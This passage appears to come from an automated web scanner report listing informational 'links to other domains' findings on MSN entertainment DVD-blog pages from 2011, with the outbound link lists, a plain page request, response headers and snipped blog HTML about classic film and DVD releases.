<b><img alt="" class="imagefloatright userImage lead" src="http://media.social.s-redacted/images/blogs/00290065-0000-0000-0000-000000000000_f947180f-0c52-49d9-bd7c-649a2d83586a_20110124194929_nowhere-boy-jam.jpg" /></b>
...[SNIP]...
<br /><img alt="" class="imagefloatleft userImage lead" src="http://media.social.s-redacted/images/blogs/00290065-0000-0000-0000-000000000000_f947180f-0c52-49d9-bd7c-649a2d83586a_20110125034319_BambiDiamondEd300.jpg" /><img alt="" class="imagefloatleft userImage lead" src="http://media.social.s-redacted/images/blogs/00290065-0000-0000-0000-000000000000_f947180f-0c52-49d9-bd7c-649a2d83586a_20110125034307_Tangled4Disc3D300.jpg" /><br />
...[SNIP]...
</b>," the famously unavailable feature film directed by and starring Dylan, is coming to DVD. <a href="http://www.litkicks.com/RenaldoAndClaraToBeFinallyReleased" title="http://www.litkicks.com/RenaldoAndClaraToBeFinallyReleased">Levi Asher at Literary Kicks</a>
...[SNIP]...
<br /><img src="http://media.social.s-redacted/images/blogs/00290065-0000-0000-0000-000000000000_f947180f-0c52-49d9-bd7c-649a2d83586a_20110124211302_Renaldo_and_Clara.jpg" alt="" class="imagefloatleft userImage lead" />Dylan pulled together friends, lovers and collaborators for the film. Sam Shepard and Allen Ginsberg reportedly co-wrote the script, Dylan starred with his then-wife Sarah Dylan while Ronnie Hawkins pl
...[SNIP]...
<br />Don't get your hopes up. Steven Gaydos, writing on <a href="http://www.varietysoundcheck.com/2011/01/the-return-of-renaldo-and-clara-it-aint-happening-babe.html" title="http://www.varietysoundcheck.com/2011/01/the-return-of-renaldo-and-clara-it-aint-happening-babe.html">Variety's Soundcheck music blog</a>
...[SNIP]...
<p><a onclick="return Msn.Navigation.OpenNew(event,this)" href="http://www.seanax.com">Sean Axmaker</a> is MSN's DVD columnist and the editor of <a onclick="return Msn.Navigation.OpenNew(event,this)" href="http://www.parallax-view.org">Parallax View</a>
...[SNIP]...
<li class="first"><a href="http://www.criterionforum.org/forum/index.php">Criterion Forum</a>
...[SNIP]...
<li><a href="http://www.criterion.com/current/posts">Criterion Current</a>
...[SNIP]...
<li><a href="http://www.davekehr.com/">Dave Kehr</a></li><li><a href="http://www.thedigitalbits.com/">The Digital Bits</a>
...[SNIP]...
<li><a href="http://www.dvdbeaver.com/">DVD Beaver</a></li><li><a href="http://www.dvdreview.com/">DVD Review </a>
...[SNIP]...
<li><a href="http://www.dvdtalk.com/dvdsavant/index.html">DVD Savant</a></li><li><a href="http://www.dvdtalk.com/">DVD Talk</a></li><li><a href="http://www.highdefdigest.com/">High-Def Digest </a>
...[SNIP]...
<li><a href="http://www.hometheaterforum.com/">Home Theater Forum</a>
...[SNIP]...
<li><a href="http://www.nitrateville.com/">Nitrateville</a>
...[SNIP]...
<li><a href="http://www.silentera.com/index.html">Silent Era</a></li><li><a href="http://www.hometheaterforum.com/forum/list/117">Talk With the Insiders at Home Theater Forum</a>
...[SNIP]...
<li><a href="http://www.tvshowsondvd.com/">TV Shows on DVD</a>
...[SNIP]...
<li class="last"><a href="http://www.videowatchdog.blogspot.com/">Video Watchblog</a>
...[SNIP]...
<li class="last"><a href="http://advertising.microsoft.com/msn/">Advertise on MSN</a>
...[SNIP]...

22.299. http://social.entertainment.redacted/movies/blogs/videodrone-blog.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://social.entertainment.redacted
Path:	/movies/blogs/videodrone-blog.aspx

Issue detail

The page was loaded from a URL containing a query string:

http://social.entertainment.redacted/movies/blogs/videodrone-blog.aspx?feat=aa535894-05e0-444f-9db6-fdb0cec6194f

The response contains the following links to other domains:

http://advertising.microsoft.com/msn/
http://download.live.com/?sku=messenger
http://insidemsn.wordpress.com/
http://mail.live.com/
http://media.social.s-msn.com/images/blogs/00290065-0000-0000-0000-000000000000_f947180f-0c52-49d9-bd7c-649a2d83586a_20110124194929_nowhere-boy-jam.jpg
http://media.social.s-msn.com/images/blogs/00290065-0000-0000-0000-000000000000_f947180f-0c52-49d9-bd7c-649a2d83586a_20110124211302_Renaldo_and_Clara.jpg
http://media.social.s-msn.com/images/blogs/00290065-0000-0000-0000-000000000000_f947180f-0c52-49d9-bd7c-649a2d83586a_20110125034307_Tangled4Disc3D300.jpg
http://media.social.s-msn.com/images/blogs/00290065-0000-0000-0000-000000000000_f947180f-0c52-49d9-bd7c-649a2d83586a_20110125034319_BambiDiamondEd300.jpg
http://media.social.s-msn.com/images/blogs/00290065-0000-0000-0000-000000000000_f947180f-0c52-49d9-bd7c-649a2d83586a_20110126000936_social-network-252x300.jpg
http://media.social.s-msn.com/images/blogs/00290065-0000-0000-0000-000000000000_f947180f-0c52-49d9-bd7c-649a2d83586a_20110126030122_127hrsDVD250.jpg
http://media.social.s-msn.com/images/blogs/00290065-0000-0000-0000-000000000000_f947180f-0c52-49d9-bd7c-649a2d83586a_20110126065439_dogtooth_200.jpg
http://media.social.s-msn.com/images/blogs/00290065-0000-0000-0000-000000000000_f947180f-0c52-49d9-bd7c-649a2d83586a_20110127205129_GleeS2V1250.jpg
http://media.social.s-msn.com/images/blogs/00290065-0000-0000-0000-000000000000_f947180f-0c52-49d9-bd7c-649a2d83586a_20110128030133_FridayNight_cover200.jpg
http://media.social.s-msn.com/images/blogs/00290065-0000-0000-0000-000000000000_f947180f-0c52-49d9-bd7c-649a2d83586a_20110128185659_You%20Only%20Live%20Once_02_300.jpg
http://msn.careerbuilder.com/?siteid=cbmsn_home&sc_cmp1=JS_MSN_Home
http://msn.foxsports.com/
http://msn.foxsports.com/cfb
http://msn.foxsports.com/collegebasketball
http://msn.foxsports.com/fantasy
http://msn.foxsports.com/foxsoccer
http://msn.foxsports.com/mlb
http://msn.foxsports.com/nascar
http://msn.foxsports.com/nba
http://msn.foxsports.com/nfl
http://msn.foxsports.com/nhl
http://msn.foxsports.com/video?from=en-us_msnhp
http://msn.whitepages.com/
http://msnportalent.112.2o7.net/b/ss/msnportalent/1/H.1--NS/0
http://parallax-view.org/2011/01/25/chabrol-noe-and-more-dvds-of-the-week/
http://search.bing.com/results.aspx
http://search.bing.com/results.aspx?FORM=entertainment
http://www.bing.com/maps/default.aspx?FORM=MSNNAV
http://www.bing.com/shopping?FORM=SHOPH2
http://www.bing.com/travel/?cid=msn_nav_lifestyle&FORM=MSNNAV
http://www.bing.com/travel/?cid=msn_nav_more&FORM=MSNNAV
http://www.bing.com/videos/browse?from=en-us_msnhp
http://www.bltwy.com/
http://www.criterion.com/current/posts
http://www.criterionforum.org/forum/index.php
http://www.davekehr.com/
http://www.delish.com/
http://www.dvdbeaver.com/
http://www.dvdreview.com/
http://www.dvdtalk.com/
http://www.dvdtalk.com/dvdsavant/index.html
http://www.filmforum.org/films/lang.html
http://www.highdefdigest.com/
http://www.hometheaterforum.com/
http://www.hometheaterforum.com/forum/list/117
http://www.litkicks.com/RenaldoAndClaraToBeFinallyReleased
http://www.movingimagesource.us/articles/the-other-fritz-lang-20110127
http://www.nitrateville.com/
http://www.nytimes.com/2011/01/23/movies/23dargis.html?_r=1
http://www.parallax-view.org/
http://www.seanax.com/
http://www.silentera.com/index.html
http://www.thedigitalbits.com/
http://www.thelmagazine.com/newyork/the-fury-fritz-lang-in-hollywood/Content?oid=1926813
http://www.tvshowsondvd.com/
http://www.varietysoundcheck.com/2011/01/the-return-of-renaldo-and-clara-it-aint-happening-babe.html
http://www.videowatchdog.blogspot.com/
http://www.villagevoice.com/2011-01-26/film/the-american-films-of-mad-genius-fritz-lang-expand-genres/
https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&ct=1296345053&rver=5.5.4177.0&wp=LBI&wreply=http:%2F%2Fsocial.entertainment.redacted%2Fmovies%2Fblogs%2Fvideodrone-blog.aspx%3Ffeat%3Daa535894-05e0-444f-9db6-fdb0cec6194f&lc=1033&id=250710
https://secure.opinionlab.com/ccc01/o.asp?ID=WpkpVtTB

Request

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 23:50:53 GMT
Server: Microsoft-IIS/6.0
P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
S: BLUMPPRENA51
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
Set-Cookie: MC1=V=3&GUID=6ac4861c5c434fd290fbfb834551bfcf; domain=.redacted; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/
Set-Cookie: MUID=C1973B82CE2546AAB5E67F5D4F163D64; domain=.entertainment.msn.com; expires=Wed, 17-Aug-2011 23:50:53 GMT; path=/
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
Content-Length: 61506

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" xmlns="http://www.w3.org/1999/xhtml"><head><meta http-e
...[SNIP]...
<div><img src="http://msnportalent.112.2O7.net/b/ss/msnportalent/1/H.1--NS/0" height="1" width="1" alt="" /></div>
...[SNIP]...
<li class="first"><a href="http://www.bltwy.com">BLTWY</a>
...[SNIP]...
<li class="c3"><a href="http://msn.foxsports.com/">Sports</a>
...[SNIP]...
<li class="first"><a href="http://msn.foxsports.com/mlb">MLB</a></li><li><a href="http://msn.foxsports.com/nascar ">NASCAR</a></li><li><a href="http://msn.foxsports.com/nba">NBA</a></li><li><a href="http://msn.foxsports.com/collegebasketball">NCAA Basketball</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/cfb">NCAA Football</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/nfl"><strong>
...[SNIP]...
<li><a href="http://msn.foxsports.com/nhl">NHL</a></li><li><a href="http://msn.foxsports.com/fantasy">Play Fantasy</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/foxsoccer">Soccer</a></li><li><a href="http://msn.foxsports.com/video?from=en-us_msnhp">Video Highlights</a>
...[SNIP]...
<li><a href="http://msn.careerbuilder.com?siteid=cbmsn_home&sc_cmp1=JS_MSN_Home">Careers & Jobs</a>
...[SNIP]...
<li><a href="http://www.delish.com/"> Cooking</a>
...[SNIP]...
<li><a href="http://www.bing.com/travel/?cid=msn_nav_lifestyle&FORM=MSNNAV "> Travel</a>
...[SNIP]...
<li><a href="http://www.bing.com/maps/default.aspx?FORM=MSNNAV">Maps & Directions</a>
...[SNIP]...
<li><a href="http://www.bing.com/videos/browse?from=en-us_msnhp">Video</a>
...[SNIP]...
<li><a href="http://insidemsn.wordpress.com">Corrections & Clarifications</a>
...[SNIP]...
<li><a href="http://msn.whitepages.com/">White Pages</a>
...[SNIP]...
<li><a href="http://www.delish.com/">Delish</a>
...[SNIP]...
<li><a href="http://www.bing.com/shopping?FORM=SHOPH2">Shopping</a></li><li><a href="https://secure.opinionlab.com/ccc01/o.asp?ID=WpkpVtTB">Feedback</a>
...[SNIP]...
<li><a href="http://www.bing.com/travel/?cid=msn_nav_more&FORM=MSNNAV ">Travel</a>
...[SNIP]...
<span class="blogo"><a href="http://search.bing.com/results.aspx?FORM=entertainment">Bing</a>
...[SNIP]...
<li class="first"><a href="http://mail.live.com/">Hotmail</a></li><li id="msg"><a href="http://download.live.com/?sku=messenger">Messenger</a></li><li class="last"><a href="https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&ct=1296345053&rver=5.5.4177.0&wp=LBI&wreply=http:%2F%2Fsocial.entertainment.redacted%2Fmovies%2Fblogs%2Fvideodrone-blog.aspx%3Ffeat%3Daa535894-05e0-444f-9db6-fdb0cec6194f&lc=1033&id=250710" class="dMSNME_1">Sign in</a>
...[SNIP]...
<div><a id="wslink" href="http://search.bing.com/results.aspx">Search the web</a>
...[SNIP]...
<br /><img alt="" class="imagefloatright userImage lead" src="http://media.social.s-redacted/images/blogs/00290065-0000-0000-0000-000000000000_f947180f-0c52-49d9-bd7c-649a2d83586a_20110126000936_social-network-252x300.jpg" />While many of the front-runners were released late in the year and are still playing in theaters -- best picture nominees "<a href="http://movies.redacted/movies/movie/black-
...[SNIP]...
<p>The Film Forum in New York begins the two-week retrospective "<a href="http://www.filmforum.org/films/lang.html" title="http://www.filmforum.org/films/lang.html">Fritz Lang  in Hollywood</a>
...[SNIP]...
surveys the German legend's work during his American exile: all 22 films he made in the United States between 1934 to 1956, in 35mm. It's the film event of the moment in New York (see <a href="http://www.nytimes.com/2011/01/23/movies/23dargis.html?_r=1" title="http://www.nytimes.com/2011/01/23/movies/23dargis.html?_r=1">Manohla Dargis in The New York Times</a>,  <a href="http://www.villagevoice.com/2011-01-26/film/the-american-films-of-mad-genius-fritz-lang-expand-genres/" title="http://www.villagevoice.com/2011-01-26/film/the-american-films-of-mad-genius-fritz-lang-expand-genres/">J. Hoberman in The Village Voice</a>, <a href="http://www.movingimagesource.us/articles/the-other-fritz-lang-20110127" title="http://www.movingimagesource.us/articles/the-other-fritz-lang-20110127">Cullen Gallagher at Moving Image Source</a>, <a href="http://www.thelmagazine.com/newyork/the-fury-fritz-lang-in-hollywood/Content?oid=1926813" title="http://www.thelmagazine.com/newyork/the-fury-fritz-lang-in-hollywood/Content?oid=1926813">Dan Callahan in The L</a>
...[SNIP]...
<p><img alt="" class="imagefloatright userImage lead" src="http://media.social.s-redacted/images/blogs/00290065-0000-0000-0000-000000000000_f947180f-0c52-49d9-bd7c-649a2d83586a_20110128185659_You%20Only%20Live%20Once_02_300.jpg" />Those of us outside of the Big Apple may not be able to join the crowds for the glory of such classics (both major and minor) projected on the big screen, but Fritz Lang is a filmmaker well rep
...[SNIP]...
<div class="pst_exc more"><img src="http://media.social.s-redacted/images/blogs/00290065-0000-0000-0000-000000000000_f947180f-0c52-49d9-bd7c-649a2d83586a_20110128030133_FridayNight_cover200.jpg" alt="" class="imagefloatright userImage lead" />Universal announces the release of the critical darling "<b>
...[SNIP]...
<p><img alt="" class="imagefloatleft userImage lead" src="http://media.social.s-redacted/images/blogs/00290065-0000-0000-0000-000000000000_f947180f-0c52-49d9-bd7c-649a2d83586a_20110127205129_GleeS2V1250.jpg" />This run of episodes features the Britney episode (with Britney Spears herself making a cameo in the gas-induced hallucination musical numbers), "The Rocky Horror Glee Show" (direct
...[SNIP]...
<br /><img src="http://media.social.s-redacted/images/blogs/00290065-0000-0000-0000-000000000000_f947180f-0c52-49d9-bd7c-649a2d83586a_20110126065439_dogtooth_200.jpg" alt="" class="imagefloatright userImage lead" />More interesting (and far less commercial) is "<b>
...[SNIP]...
</blockquote><a href="http://parallax-view.org/2011/01/25/chabrol-noe-and-more-dvds-of-the-week/" title="http://parallax-view.org/2011/01/25/chabrol-noe-and-more-dvds-of-the-week/"><br />
...[SNIP]...
<i><img src="http://media.social.s-redacted/images/blogs/00290065-0000-0000-0000-000000000000_f947180f-0c52-49d9-bd7c-649a2d83586a_20110126030122_127hrsDVD250.jpg" alt="" class="imagefloatleft userImage lead" /></i>
...[SNIP]...
<b><img alt="" class="imagefloatright userImage lead" src="http://media.social.s-redacted/images/blogs/00290065-0000-0000-0000-000000000000_f947180f-0c52-49d9-bd7c-649a2d83586a_20110124194929_nowhere-boy-jam.jpg" /></b>
...[SNIP]...
<br /><img alt="" class="imagefloatleft userImage lead" src="http://media.social.s-redacted/images/blogs/00290065-0000-0000-0000-000000000000_f947180f-0c52-49d9-bd7c-649a2d83586a_20110125034319_BambiDiamondEd300.jpg" /><img alt="" class="imagefloatleft userImage lead" src="http://media.social.s-redacted/images/blogs/00290065-0000-0000-0000-000000000000_f947180f-0c52-49d9-bd7c-649a2d83586a_20110125034307_Tangled4Disc3D300.jpg" /><br />
...[SNIP]...
</b>," the famously unavailable feature film directed by and starring Dylan, is coming to DVD. <a href="http://www.litkicks.com/RenaldoAndClaraToBeFinallyReleased" title="http://www.litkicks.com/RenaldoAndClaraToBeFinallyReleased">Levi Asher at Literary Kicks</a>
...[SNIP]...
<br /><img src="http://media.social.s-redacted/images/blogs/00290065-0000-0000-0000-000000000000_f947180f-0c52-49d9-bd7c-649a2d83586a_20110124211302_Renaldo_and_Clara.jpg" alt="" class="imagefloatleft userImage lead" />Dylan pulled together friends, lovers and collaborators for the film. Sam Shepard and Allen Ginsberg reportedly co-wrote the script, Dylan starred with his then-wife Sarah Dylan while Ronnie Hawkins pl
...[SNIP]...
<br />Don't get your hopes up. Steven Gaydos, writing on <a href="http://www.varietysoundcheck.com/2011/01/the-return-of-renaldo-and-clara-it-aint-happening-babe.html" title="http://www.varietysoundcheck.com/2011/01/the-return-of-renaldo-and-clara-it-aint-happening-babe.html">Variety's Soundcheck music blog</a>
...[SNIP]...
<p><a onclick="return Msn.Navigation.OpenNew(event,this)" href="http://www.seanax.com">Sean Axmaker</a> is MSN's DVD columnist and the editor of <a onclick="return Msn.Navigation.OpenNew(event,this)" href="http://www.parallax-view.org">Parallax View</a>
...[SNIP]...
<li class="first"><a href="http://www.criterionforum.org/forum/index.php">Criterion Forum</a>
...[SNIP]...
<li><a href="http://www.criterion.com/current/posts">Criterion Current</a>
...[SNIP]...
<li><a href="http://www.davekehr.com/">Dave Kehr</a></li><li><a href="http://www.thedigitalbits.com/">The Digital Bits</a>
...[SNIP]...
<li><a href="http://www.dvdbeaver.com/">DVD Beaver</a></li><li><a href="http://www.dvdreview.com/">DVD Review </a>
...[SNIP]...
<li><a href="http://www.dvdtalk.com/dvdsavant/index.html">DVD Savant</a></li><li><a href="http://www.dvdtalk.com/">DVD Talk</a></li><li><a href="http://www.highdefdigest.com/">High-Def Digest </a>
...[SNIP]...
<li><a href="http://www.hometheaterforum.com/">Home Theater Forum</a>
...[SNIP]...
<li><a href="http://www.nitrateville.com/">Nitrateville</a>
...[SNIP]...
<li><a href="http://www.silentera.com/index.html">Silent Era</a></li><li><a href="http://www.hometheaterforum.com/forum/list/117">Talk With the Insiders at Home Theater Forum</a>
...[SNIP]...
<li><a href="http://www.tvshowsondvd.com/">TV Shows on DVD</a>
...[SNIP]...
<li class="last"><a href="http://www.videowatchdog.blogspot.com/">Video Watchblog</a>
...[SNIP]...
<li class="last"><a href="http://advertising.microsoft.com/msn/">Advertise on MSN</a>
...[SNIP]...

22.300. http://social.entertainment.redacted/movies/blogs/videodrone-blogpost.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://social.entertainment.redacted
Path:	/movies/blogs/videodrone-blogpost.aspx

Issue detail

The page was loaded from a URL containing a query string:

http://social.entertainment.redacted/movies/blogs/videodrone-blogpost.aspx?post=55ccee98-7e3b-4bfa-bd91-b7e77c8bc174

The response contains the following links to other domains:

http://advertising.microsoft.com/msn/
http://blu.stc.s-redacted/br/scp/css/15/decoration/toolbar/rating/down_normal.gif
http://blu.stc.s-redacted/br/scp/css/15/decoration/toolbar/rating/up_normal.gif
http://download.live.com/?sku=messenger
http://insidemsn.wordpress.com/
http://mail.live.com/
http://media.social.s-msn.com/images/blogs/00290065-0000-0000-0000-000000000000_f947180f-0c52-49d9-bd7c-649a2d83586a_20110126065439_dogtooth_200.jpg
http://msn.careerbuilder.com/?siteid=cbmsn_home&sc_cmp1=JS_MSN_Home
http://msn.foxsports.com/
http://msn.foxsports.com/cfb
http://msn.foxsports.com/collegebasketball
http://msn.foxsports.com/fantasy
http://msn.foxsports.com/foxsoccer
http://msn.foxsports.com/mlb
http://msn.foxsports.com/nascar
http://msn.foxsports.com/nba
http://msn.foxsports.com/nfl
http://msn.foxsports.com/nhl
http://msn.foxsports.com/video?from=en-us_msnhp
http://msn.whitepages.com/
http://msnportalent.112.2o7.net/b/ss/msnportalent/1/H.1--NS/0
http://parallax-view.org/2011/01/25/chabrol-noe-and-more-dvds-of-the-week/
http://search.bing.com/results.aspx
http://search.bing.com/results.aspx?FORM=entertainment
http://www.bing.com/maps/default.aspx?FORM=MSNNAV
http://www.bing.com/shopping?FORM=SHOPH2
http://www.bing.com/travel/?cid=msn_nav_lifestyle&FORM=MSNNAV
http://www.bing.com/travel/?cid=msn_nav_more&FORM=MSNNAV
http://www.bing.com/videos/browse?from=en-us_msnhp
http://www.bltwy.com/
http://www.criterion.com/current/posts
http://www.criterionforum.org/forum/index.php
http://www.davekehr.com/
http://www.delish.com/
http://www.dvdbeaver.com/
http://www.dvdreview.com/
http://www.dvdtalk.com/
http://www.dvdtalk.com/dvdsavant/index.html
http://www.highdefdigest.com/
http://www.hometheaterforum.com/
http://www.hometheaterforum.com/forum/list/117
http://www.nitrateville.com/
http://www.parallax-view.org/
http://www.seanax.com/
http://www.silentera.com/index.html
http://www.thedigitalbits.com/
http://www.tvshowsondvd.com/
http://www.videowatchdog.blogspot.com/
https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&ct=1296406662&rver=5.5.4177.0&wp=LBI&wreply=http:%2F%2Fsocial.entertainment.redacted%2Fmovies%2Fblogs%2Fvideodrone-blogpost.aspx%3Fpost%3D55ccee98-7e3b-4bfa-bd91-b7e77c8bc174&lc=1033&id=250710
https://secure.opinionlab.com/ccc01/o.asp?ID=WpkpVtTB

Request

GET /movies/blogs/videodrone-blogpost.aspx?post=55ccee98-7e3b-4bfa-bd91-b7e77c8bc174 HTTP/1.1
Host: social.entertainment.msn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 16:57:42 GMT
Server: Microsoft-IIS/6.0
P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
S: BLUMPPRENA50
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
Set-Cookie: MC1=V=3&GUID=74e3f85a127042c59575b1cc56383c8e; domain=.redacted; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/
Set-Cookie: MUID=BC0C21C2C4134FB5BB7DCFD44CA28FF4; domain=.entertainment.msn.com; expires=Thu, 18-Aug-2011 16:57:42 GMT; path=/
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
Content-Length: 44811

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" xmlns="http://www.w3.org/1999/xhtml"><head><meta http-e
...[SNIP]...
<div><img src="http://msnportalent.112.2O7.net/b/ss/msnportalent/1/H.1--NS/0" height="1" width="1" alt="" /></div>
...[SNIP]...
<li class="first"><a href="http://www.bltwy.com">BLTWY</a>
...[SNIP]...
<li class="c3"><a href="http://msn.foxsports.com/">Sports</a>
...[SNIP]...
<li class="first"><a href="http://msn.foxsports.com/mlb">MLB</a></li><li><a href="http://msn.foxsports.com/nascar ">NASCAR</a></li><li><a href="http://msn.foxsports.com/nba">NBA</a></li><li><a href="http://msn.foxsports.com/collegebasketball">NCAA Basketball</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/cfb">NCAA Football</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/nfl"><strong>
...[SNIP]...
<li><a href="http://msn.foxsports.com/nhl">NHL</a></li><li><a href="http://msn.foxsports.com/fantasy">Play Fantasy</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/foxsoccer">Soccer</a></li><li><a href="http://msn.foxsports.com/video?from=en-us_msnhp">Video Highlights</a>
...[SNIP]...
<li><a href="http://msn.careerbuilder.com?siteid=cbmsn_home&sc_cmp1=JS_MSN_Home">Careers & Jobs</a>
...[SNIP]...
<li><a href="http://www.delish.com/"> Cooking</a>
...[SNIP]...
<li><a href="http://www.bing.com/travel/?cid=msn_nav_lifestyle&FORM=MSNNAV "> Travel</a>
...[SNIP]...
<li><a href="http://www.bing.com/maps/default.aspx?FORM=MSNNAV">Maps & Directions</a>
...[SNIP]...
<li><a href="http://www.bing.com/videos/browse?from=en-us_msnhp">Video</a>
...[SNIP]...
<li><a href="http://insidemsn.wordpress.com">Corrections & Clarifications</a>
...[SNIP]...
<li><a href="http://msn.whitepages.com/">White Pages</a>
...[SNIP]...
<li><a href="http://www.delish.com/">Delish</a>
...[SNIP]...
<li><a href="http://www.bing.com/shopping?FORM=SHOPH2">Shopping</a></li><li><a href="https://secure.opinionlab.com/ccc01/o.asp?ID=WpkpVtTB">Feedback</a>
...[SNIP]...
<li><a href="http://www.bing.com/travel/?cid=msn_nav_more&FORM=MSNNAV ">Travel</a>
...[SNIP]...
<span class="blogo"><a href="http://search.bing.com/results.aspx?FORM=entertainment">Bing</a>
...[SNIP]...
<li class="first"><a href="http://mail.live.com/">Hotmail</a></li><li id="msg"><a href="http://download.live.com/?sku=messenger">Messenger</a></li><li class="last"><a href="https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&ct=1296406662&rver=5.5.4177.0&wp=LBI&wreply=http:%2F%2Fsocial.entertainment.redacted%2Fmovies%2Fblogs%2Fvideodrone-blogpost.aspx%3Fpost%3D55ccee98-7e3b-4bfa-bd91-b7e77c8bc174&lc=1033&id=250710" class="dMSNME_1">Sign in</a>
...[SNIP]...
<div><a id="wslink" href="http://search.bing.com/results.aspx">Search the web</a>
...[SNIP]...
<br /><img src="http://media.social.s-redacted/images/blogs/00290065-0000-0000-0000-000000000000_f947180f-0c52-49d9-bd7c-649a2d83586a_20110126065439_dogtooth_200.jpg" alt="" class="imagefloatright userImage lead" />More interesting (and far less commercial) is "<b>
...[SNIP]...
</blockquote><a href="http://parallax-view.org/2011/01/25/chabrol-noe-and-more-dvds-of-the-week/" title="http://parallax-view.org/2011/01/25/chabrol-noe-and-more-dvds-of-the-week/"><br />
...[SNIP]...
ttp://social.entertainment.redacted/movies/blogs/videodrone-blogpost.aspx?post=55ccee98-7e3b-4bfa-bd91-b7e77c8bc174&rrurt=1&rrcontrolId=ratCntrlBinary" title="You recommend this" rel="nofollow"><img id="ratCntrlBinaryYesButton" class="rrimg" src="http://blu.stc.s-msn.com/br/scp/css/15/decoration/toolbar/rating/up_normal.gif" title="You recommend this" alt="You recommend this" /><span id="rrBCYesPer" class="rrbpercent">
...[SNIP]...
social.entertainment.msn.com/movies/blogs/videodrone-blogpost.aspx?post=55ccee98-7e3b-4bfa-bd91-b7e77c8bc174&rrurt=0&rrcontrolId=ratCntrlBinary" title="You don't recommend this" rel="nofollow"><img id="ratCntrlBinaryNoButton" class="rrimg" src="http://blu.stc.s-msn.com/br/scp/css/15/decoration/toolbar/rating/down_normal.gif" title="You don't recommend this" alt="You don't recommend this" /><span id="rrBCNoPer" class="rrbpercent">
...[SNIP]...
<p><a onclick="return Msn.Navigation.OpenNew(event,this)" href="http://www.seanax.com">Sean Axmaker</a> is MSN's DVD columnist and the editor of <a onclick="return Msn.Navigation.OpenNew(event,this)" href="http://www.parallax-view.org">Parallax View</a>
...[SNIP]...
<li class="first"><a href="http://www.criterionforum.org/forum/index.php">Criterion Forum</a>
...[SNIP]...
<li><a href="http://www.criterion.com/current/posts">Criterion Current</a>
...[SNIP]...
<li><a href="http://www.davekehr.com/">Dave Kehr</a></li><li><a href="http://www.thedigitalbits.com/">The Digital Bits</a>
...[SNIP]...
<li><a href="http://www.dvdbeaver.com/">DVD Beaver</a></li><li><a href="http://www.dvdreview.com/">DVD Review </a>
...[SNIP]...
<li><a href="http://www.dvdtalk.com/dvdsavant/index.html">DVD Savant</a></li><li><a href="http://www.dvdtalk.com/">DVD Talk</a></li><li><a href="http://www.highdefdigest.com/">High-Def Digest </a>
...[SNIP]...
<li><a href="http://www.hometheaterforum.com/">Home Theater Forum</a>
...[SNIP]...
<li><a href="http://www.nitrateville.com/">Nitrateville</a>
...[SNIP]...
<li><a href="http://www.silentera.com/index.html">Silent Era</a></li><li><a href="http://www.hometheaterforum.com/forum/list/117">Talk With the Insiders at Home Theater Forum</a>
...[SNIP]...
<li><a href="http://www.tvshowsondvd.com/">TV Shows on DVD</a>
...[SNIP]...
<li class="last"><a href="http://www.videowatchdog.blogspot.com/">Video Watchblog</a>
...[SNIP]...
<li class="last"><a href="http://advertising.microsoft.com/msn/">Advertise on MSN</a>
...[SNIP]...

22.301. http://social.entertainment.redacted/movies/blogs/videodrone-blogpost.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://social.entertainment.redacted
Path:	/movies/blogs/videodrone-blogpost.aspx

Issue detail

The page was loaded from a URL containing a query string:

http://social.entertainment.redacted/movies/blogs/videodrone-blogpost.aspx?post=55ccee98-7e3b-4bfa-bd91-b7e77c8bc174

The response contains the following links to other domains:

http://advertising.microsoft.com/msn/
http://blu.stc.s-redacted/br/scp/css/15/decoration/toolbar/rating/down_normal.gif
http://blu.stc.s-redacted/br/scp/css/15/decoration/toolbar/rating/up_normal.gif
http://download.live.com/?sku=messenger
http://insidemsn.wordpress.com/
http://mail.live.com/
http://media.social.s-msn.com/images/blogs/00290065-0000-0000-0000-000000000000_f947180f-0c52-49d9-bd7c-649a2d83586a_20110126065439_dogtooth_200.jpg
http://msn.careerbuilder.com/?siteid=cbmsn_home&sc_cmp1=JS_MSN_Home
http://msn.foxsports.com/
http://msn.foxsports.com/cfb
http://msn.foxsports.com/collegebasketball
http://msn.foxsports.com/fantasy
http://msn.foxsports.com/foxsoccer
http://msn.foxsports.com/mlb
http://msn.foxsports.com/nascar
http://msn.foxsports.com/nba
http://msn.foxsports.com/nfl
http://msn.foxsports.com/nhl
http://msn.foxsports.com/video?from=en-us_msnhp
http://msn.whitepages.com/
http://msnportalent.112.2o7.net/b/ss/msnportalent/1/H.1--NS/0
http://parallax-view.org/2011/01/25/chabrol-noe-and-more-dvds-of-the-week/
http://search.bing.com/results.aspx
http://search.bing.com/results.aspx?FORM=entertainment
http://www.bing.com/maps/default.aspx?FORM=MSNNAV
http://www.bing.com/shopping?FORM=SHOPH2
http://www.bing.com/travel/?cid=msn_nav_lifestyle&FORM=MSNNAV
